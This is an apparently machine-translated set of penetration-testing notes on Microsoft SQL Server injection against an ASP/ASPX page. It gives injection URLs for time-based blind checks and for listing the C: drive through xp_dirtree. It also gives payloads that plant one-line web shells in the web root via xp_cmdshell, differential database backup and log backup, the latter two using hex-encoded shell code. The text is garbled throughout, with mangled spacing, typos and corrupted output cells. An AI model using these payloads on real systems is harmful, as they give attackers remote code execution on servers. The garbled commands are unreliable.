SQL Server injection notes

In some large companies, mysql + php + apache is usually used, and Microsoft SQL Server injection is rarely used. During vulnerability processing or testing, for some valuable injection testing ideas and SQL statements, you can forget the text. Here, you simply put SQL server injection notes for easy query.
 
In some blind injection cases, especially when there are not too many error Echo information, if the statement is successfully executed, the return is normal, if a failure occurs, an error message such as "server connection timeout" is displayed in the pop-up box, indicating that the table or field cannot be burst. Initially, db_owner, sysadmin, and xp_cmdshell queries are all permitted, as shown below:


However, the SQL-shell function of sqlmqp always fails to be used to execute insert. Later, I directly tested the insert statement in the browser and found that the execution failed. It can be seen that the SQL-shell function of sqlmap still has limited judgment on whether the statement is executed, and nothing is returned.
 
1. Most of the statements such as "and 1 = 1" are often filtered out. Here, I forget SQL server's time-based injection judgment:
 
Test. aspx? ID = 300 waitfor delay '0: 0: 5 '--
 
2. The web path HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ W3SVC \ Parameters \ Virtual Roots was obtained by reading the registry value through xp_regread, but the returned result is null, therefore, we use the following method to traverse the C disk and write the results into the temporary table (NOTE: When the extended storage function is executed, the created table segments should be consistent with the parameters of the extended storage function, otherwise, an error occurs !) :
 
Test. aspx? ID = 300; create table tmp ([ID] int IDENTITY (300) not null, [name] [nvarchar] () not null, [depth] [int] not null, [isfile] [nvarchar] (50) NULL); insert into tmp exec master .. xp_dirtree 'C:/', 1, 1
 
Run the values in Table TMP using sqlmap:
 
Table: dbo. tmp
[11 entries]
+ ---- + --------------------------- + ------- + -------- +
| ID | name | depth | isfile |
+ ---- + --------------------------- + ------- + -------- +
| 1 | $ Recycle. Bin | 1 | 0 |
| 10 | Users | 1 | 0 |
| 11 | Windows | 1 | 0 |
| 2 | Documents and Settings | 1 | 0 |
| 3 | inetpub | 1 | 0 |
| 4 | PerfLogs | 1 | 0 |
| 5 | Program Files | 1 | 0 |
| 6 | Program Files (x86) | 1 | 0 |
| 7 | ProgramData | 1! | 0BA |
| 8 | Recovery | 1 | 0 |
| 9 | invalid FM Volume Infornation | 1 | 0 |
+ ---- + --------------------------- + ------- + -------- +
 
For example, if the site's main directory is in the default path C:/inetpub/wwwroot, you can use the following command to write a Trojan horse. The brackets must be preceded by ^ escape:
 
Test. aspx? ID = 300; exec master .. xp_cmdshell 'echo ^ <% @ Page Language = "Jscript" validateRequest = "false" % ^> ^ <% Response. write (eval (Request. item ["w"], "unsafe"); % ^> C:/inetpub/wwwroot/make. aspx ';
 
In addition, you can also write a trojan in one sentence through database differential backup:
 
Test. asp? ID = 300; create table [dbo]. [dtest] ([cmd] [image]); create a dtest table and a cmd field of the image type. For other data text types, for example, text and nvarchar may be converted to other formats during backup, such as wide characters.
Test. asp? ID = 300; insert into dtest (cmd) values (0x3c25657865637574502810957175657374282261222929253e); -- the hex data is one sentence: <% execute (request ("a") %>
Test. asp? ID = 300; backup database name to disk = 'C:/inetpub/wwwroot/d. asp 'with differential, FORMAT; -- only backup DIFFERENTIAL data to asp files
 
Or write data through log backup:
 
Test. asp? ID = 300; alter database dbname set recover full; set the database to FULL recovery mode to Allow Log backup
Test. asp? ID = 300; create table cmd (a image );
Test. asp? ID = 300; backup log dbname do disk = 'C: \ cmd' with init; Initialization log
Test. asp? ID = 300; insert into cmd (a) values (0x3c25657865637574502810957175657374282261222929253e); insert a single-sentence Trojan
Test. asp? ID = 300; backup log dbname to disk = 'C:/inetpub/wwwroot/d. asp '; drop table cmd; -- back up logs containing Trojans and delete the created tables